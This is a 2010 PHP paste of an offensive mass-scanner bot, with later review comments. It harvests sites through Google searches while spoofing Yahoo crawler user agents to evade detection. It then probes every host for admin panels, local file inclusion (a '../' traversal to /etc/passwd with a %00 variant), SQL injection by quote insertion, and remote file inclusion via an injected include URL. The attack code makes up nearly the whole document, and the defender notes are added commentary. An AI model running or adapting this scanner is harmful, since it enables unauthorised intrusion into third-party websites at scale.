Paste: rfi scanner lfi sqli admin

Author: -null-
Mode: php
Date: Thu, 20 May 2010 10:50:59
<?php
/* -null- bot v2 coded by -null-.... enjoy and greets to..sorry bout those who i forgot
   Dasteem | alphanix | d0ped | luit | triCk | cybern3tic | pimpinjg | led-zeppelin | khui | navirio | boxhead | marezzi | d3trimental | fx0 | Citrobacter
   h4cky0u.org | p0ison.org | gonullyourself.org
   Let this be first release under X2 crew...we are -null- and Citrobacter
``````````.`..``.``.-.``````````````````````````````````````````````
```````````-:.``````.::-`.``````````````````````````````````````````
`````..```:/.``...`.``.o:.``````````````````````````````````````````
`````.``.-s-..`````````o+```````````````````````````````````````````
`````````.o+```````````oo.``````````````````````````````````````````
``````.``./+:``..````..o+-````````````````.`````.``.````````````````
`````.`..`:++.````````.o/+````````````````.-/:.`.`.`````````````````
````````.`-+++.``......o/+.```````````````.s/-:/+:.`````````````````
```````````+/+:-:+++++oo++/:-..```````````./o/--o+.`````````````````
```````````++++++++/+o++/--/o:`.``````````./++/+/-..````````````````
`````````.-++//++++++++::-:+++-.`````.```./+/.....``````````````````
``````.``.o/---/:/++++//+/+++/+-``..``.`./o/..``````````````````````
```````.`./++//+/+++o+ooo//+///+..```.`:++/```.`````````````````````
``````````./+/////o++yo++//////o.````.:++/..`````````.--..``````````
``````````../++///+//o//++/ooo++.`.`.:++/```````````.+o+::.``.``````
````````````.:/+//+///+ssyys+/o-```-:o+:`.```````````:o++s+.`.``````
````````````...-//++++so+oo///+/-:/+++-`````.``.````.+o:::-..```````
```````````.````.-:::::::/++///++++o:...``.``...-:::+o:``..`````````
````````.``````.```````.-/o++//++ooo++++/:///+++///:-.`.````````````
.`.//:.````....---::::/+++::++osoo++++++oos----------..``...`.``````
.`/+-++////++++++++++//:-.``-so++++++++++oyooooooooooo+/--.`````````
`.-o..o+::-------...````.``.:o+++o++++oossssssssoosssosssoo/-.`.````
.`-+/++/`..````````````````./so++++osssssossssssooosossssssso/..````
.`...--.`````````````````.-++::+sssssossossssssssoossssosssssso/..`.
`````````.`````.--..````./o/.`..+ssosoosssssssssssosssysssssssss+-``
```````````.`.`:o+o:----++-`````.:sssssooosssssssysssssssyssssssso-.
```````````````.+/oo//+/:.```.``.-ssssssosssssssosssyysoysssssssoso-
```````````````.++o:``.`````````.-sosos::+oosssoososyssssssssssssss:
````````````````....``.``````````.oossy..`.--:++oosyssysosssssssoss-
```````````````````.```````````..`+ssos.``.`````.-osssyossssssooss/.
```````````````````````````````.``.ssss:`.``````.`+ssso:+oooooo+/:.`
``````````````````````````````````.-sso+.`````````+soos-`......``.`.
```````````````````````````````.```.ooss-`.``````.-ooss+..``````````
``````````````````````````````````..osss:````````.`-ooss:.``````````
```````````````````````````````````:ssos:.``````````-osss:``..``````
````````````````````````````.`.../+ssso:..```````````./sss...`.`````
``````````````````````````.``.`/sossoo.``.````````````./sso+:.``````
``````````````````````````.``.`ss:/+so..``````````````.os/sos/``````
```````````````````````````...`-+o:o/.````````````````:y:.:ss/.`````
``````````````````````````.``.```..`````.````````````.`-/-//-``.

*/
// modify these as needed, you must change variables marked with * otherwise the function that uses that variable wont work

// how many google pages to go through, remember minus 1 because l cbf fixing the increment bug, l fix it in final version
// NOTE(review): the search loop computes 10 * $how_many and runs while its offset is <= that value,
// stepping by 10, so it fetches $how_many + 1 result pages; this is the "increment bug" referred to above.
$how_many = 1;
// lfi scanner, leave this unless you have other ideas
// NOTE(review): fixed directory-traversal string that the LFI branch places in a URL parameter.
// For defenders: a parameter value made of repeated "../" segments ending in etc/passwd, optionally
// followed by %00, is a stable signature to match in access logs and WAF rules.
$passwd = '../../../../../../../../../../etc/passwd';

// * this you must change, this is your rfi file, create a file to include from some host with the contents from lines 60 to 62, and set this to its url location
// NOTE(review): URL of the marker file that the RFI branch places in a URL parameter. For defenders:
// a parameter value that is an absolute http:// URL ending in "?" is the request-side indicator;
// PHP's allow_url_include setting, when off, prevents include/require from loading remote URLs.
$my_rfi = "http://127.0.0.1/rfi.txt?";

/*

<?php
echo "Scanned by -null- scanner v2";
?>

*/








// Runtime setup: error output is silenced, the execution time limit is lifted and the memory
// limit is raised, so failed fetches and undefined indexes further down produce no diagnostics.
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '9999M');
// Counters reported in the summary printed at the end of a scan.
$scan_count = 0;
$success = 0;
$failrate = 0;



// Read the search query ("dork") from the POST body. stripslashes() is the only processing it gets;
// the value is later interpolated into a search URL and echoed into the result page as-is.
$query = stripslashes($_POST['dork']);
// No query submitted: print the input form (query text box plus scan-type selector) and do nothing else.
// NOTE(review): the markup closes TABLE/td/tr elements that were never opened and has no submit control.
if ($query == '') {
echo "
<form action='' method= 'post' >
<center><b>Query</b><br>
<input type='text' size='20' name='dork'>

<select name='vuln_type'>
<option value='ADMIN'>Admin scanner</option>
<option value='SQLI'>SQLI scanner</option>
<option value='LFI'>LFI scanner</option>
<option value='RFI'>RFI scanner</option>
</select></form></TABLE></td></tr></center>
";
}
// Main scan path, entered only when a query was posted. Overall flow: fetch search-result pages
// for the query, pull every linked URL out of the HTML, reduce each to a host, drop hosts on the
// blacklist, then run one of four probes (ADMIN / LFI / SQLI / RFI) and print a [+] or [-] line.
// NOTE(review): eregi()/eregi_replace() used throughout belong to the ereg extension, which was
// removed in PHP 7.0, so this paste dates to PHP 5.x.
if ($query != '' ) {

// Probe selector taken straight from the form; a value other than the four handled below
// results in no probe being run for any URL.
$scan_type = $_POST['vuln_type'];





// useragents to bypass google captcha bullshit and stop google detecting the bot
// NOTE(review): six User-Agent strings that claim to be Yahoo crawlers. They are applied only to
// the search-engine request below. A request carrying one of these strings from an address that
// does not belong to that crawler is a usable detection signal.

$agents = array('Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)',
 'Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)',
 'YahooFeedSeeker/2.0 (compatible; Mozilla 4.0; MSIE 5.5; http://publisher.yahoo.com/rssguide; users …; views …)', 
 'Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)', 
 'Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 
 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)');





// Pagination state: $started_rounds is the result offset passed as start=, advanced by 10 per page.
$rounds = 10 * $how_many;
$started_rounds = 0;
$counted = 10;
while ($started_rounds <= $rounds) {
$counted++;
// NOTE(review): the index is drawn from 0..23 although $agents has six entries (0..5), so most
// draws select no entry and $useragent is then empty (the notice is hidden by error_reporting(0)).
$rand = rand('0', '23');
$useragent = $agents[$rand];







// Fetch one page of search results over plain HTTP. $query is interpolated into the URL without
// URL-encoding; the response body is kept in $file.
$transf = curl_init();
curl_setopt($transf, CURLOPT_USERAGENT, $useragent); 
        curl_setopt($transf, CURLOPT_RETURNTRANSFER, 1);
       curl_setopt($transf, CURLOPT_URL, "http://www.google.com/search?q=$query&hl=en&start=$started_rounds&sa=N");
     $file = curl_exec($transf);
       curl_close($transf);


















// Collect every <a href="http..."> target in the result page; $ok[1] holds the text that follows
// "http" up to the closing quote.
preg_match_all ("/a[\s]+href[\s]?=[\s\"\']+". "http(.*?)[\"\']+.*?"."/", $file, $ok);
$count = count($ok[1]);
$started_rounds = $started_rounds + 10;

// Per-link loop. It reuses $counted as its index, overwriting the value set before the while loop.
for ($counted = 0; $counted < $count ; $counted++) {

// Host extraction: strip "http://", "https" and "www." (the dot is an unescaped regex wildcard),
// then keep everything before the first "/". A link with no "/" after the host yields an empty
// result, and an https link is reduced to ":"; both are discarded by the check further down.
$url = "http" . $ok[1]["$counted"];
$url2 = eregi_replace("http://|https|www.", "", $url);
$total = strlen($url2);
$pos = strpos($url2, "/");
$sum = $total -$pos;
$domain = substr($url2, 0, -$sum);
// filter out the shit... This is your blacklist, be sure to seperate the url, and to eliminate subdomains add the main site and then .site as well
// NOTE(review): the pattern is unanchored, case-insensitive and its dots are unescaped, so each
// alternative matches anywhere in the host (".go" matches any character followed by "go").
// A matching host is blanked and therefore never probed.
if (eregi("youtube.com|google.com|googleusercontent.com|facebook.com|photobucket.com|.mil|.gov|.edu|.au|.go", $domain))
{
$domain = '';
}
if ($domain != '' && $domain != ':') {

// NOTE(review): all four probes below call get_headers()/file_get_contents() without a stream
// context, so the crawler User-Agent list is not applied to them; the User-Agent they carry
// depends on the PHP configuration of the host running the script.

if ($scan_type == 'ADMIN') {

// admin finder
// Requests http://<host>/admin/ and http://<host>/adm/ and reports [+] when the first status line
// contains "200". For defenders: back-to-back requests for these two paths from one source are
// the footprint; admin endpoints need authentication regardless of whether the path is found.
$scan_for = array('admin', 'adm');


$host = $domain;
foreach ($scan_for as $scan){
$scan_count++;
$headers= get_headers("http://$domain/$scan/");


if (eregi('200', $headers[0])) {
echo "<br>[+]$host/$scan";
$success++;

} else {
echo "<br>[-]$host/$scan";
$failrate++;
// do something here

}
}
} else {
if ($scan_type == 'LFI') {
// LFI probe: only links that contain "=" are considered.
if (!eregi("=", $url))
{
$url = '';
}
if ($url != ''){
$scan_count++;
// $clean[0] is the link up to its first "="; the original value and everything after it are
// dropped and replaced by the traversal string, then by the same string with "%00" appended.
// A response containing "root:x:0" is reported as [+].
// For defenders: never hand request parameters to include/require or file reads without mapping
// them to a fixed allow-list of names; current PHP versions reject paths containing NUL bytes.
$clean = explode('=', $url);
$test2 = "$clean[0]=$passwd";
$test3 = "$clean[0]=$passwd%00";
$exploit_1 = file_get_contents($test2);
if (eregi("root:x:0", $exploit_1)) {
echo "<br>[+]$test2";
$success++;
} else {
$exploit_2 = file_get_contents($test3);
if (eregi("root:x:0", $exploit_2)) {
echo "<br>[+]$test3";
$success++;
} else {
$failrate++;
echo "<br>[-]$test2";
echo "<br>[-]$test3";
}
}
}
} else {

if ($scan_type == 'SQLI') {

// SQLI probe: only links that contain "=" are considered.
if (!eregi("=", $url))
{
$url = '';
}
if ($url != ''){
$scan_count++;
// Every "=" in the link gets a single and a double quote inserted after it, and the page is
// fetched once. The response is entity-decoded, stripped of tags and searched for generic words
// (database, fetch, error, MySQL, SQL, query, Warning). Those words also occur on ordinary pages,
// so a [+] line is only a candidate, not a confirmed finding.
// For defenders: "='\"" in a query string is the request-side indicator; parameterised queries
// and keeping database error text out of responses remove what this check relies on.
$clean = str_replace("=", "='". '"', $url);

$exploit_1 = file_get_contents($clean);
if( preg_match_all("/\b(?:database|fetch|error|MySQL|mysql|SQL|query|Warning)\b/i", strip_tags(html_entity_decode($exploit_1) ) , $useless)) {

echo "<br>[+]$clean";


$success++;
} else {
echo "<br>[-]$clean";
$failrate++;

}
}
} else {
if ($scan_type == 'RFI') {
// RFI probe: only links that contain "=" are considered.
if (!eregi("=", $url))
{
$url = '';
}
if ($url != ''){
$scan_count++;
// Same shape as the LFI probe, but the value placed after the first "=" is the $my_rfi URL
// (then the same URL with "%00" appended). A response containing the marker text
// "Scanned by -null- scanner v2" is reported as [+].
// For defenders: the indicators are an absolute URL as a parameter value and an unexpected
// outbound HTTP fetch from the web server; that marker string in a response body or in proxy
// logs ties the traffic to this tool.
$clean = explode('=', $url);
$test2 = "$clean[0]=$my_rfi";
$test3 = "$clean[0]=$my_rfi%00";
$exploit_1 = file_get_contents($test2);
if (eregi("Scanned by -null- scanner v2", $exploit_1)) {
echo "<br>[+]$test2";
$success++;
} else {
$exploit_2 = file_get_contents($test3);
if (eregi("Scanned by -null- scanner v2", $exploit_2)) {
echo "<br>[+]$test3";
$success++;
} else {
$failrate++;
echo "<br>[-]$test2";
echo "<br>[-]$test3";
}
}
}
}
}
}
}

}
}
} 

// Normalise the counters before printing; both were initialised to 0 before the scan started.
if ($success == '') {
$success = 0;
}
if ($failrate == '') {
$failrate = 0;
}
// Summary block. NOTE(review): $query, like the probed URLs echoed in the [+]/[-] lines above,
// is written into the HTML without escaping, so markup in the posted query or in a harvested
// link is rendered by the browser viewing this page.
echo "
<br><br><br><br><br><b>Total scanned urls: <u>$scan_count</u></b>
<br>Successful scans <u>$success</u>
<br>Failed scans <u>$failrate</u>
<br>Search query <u>$query</u>";

}
// Prints the body of the last search-results page fetched by the scan loop, unmodified, after the
// summary. $file is only assigned inside that loop, so nothing is printed when no query was posted.
// NOTE(review): this emits third-party HTML verbatim into the page shown to whoever runs the script.
echo $file;
?>
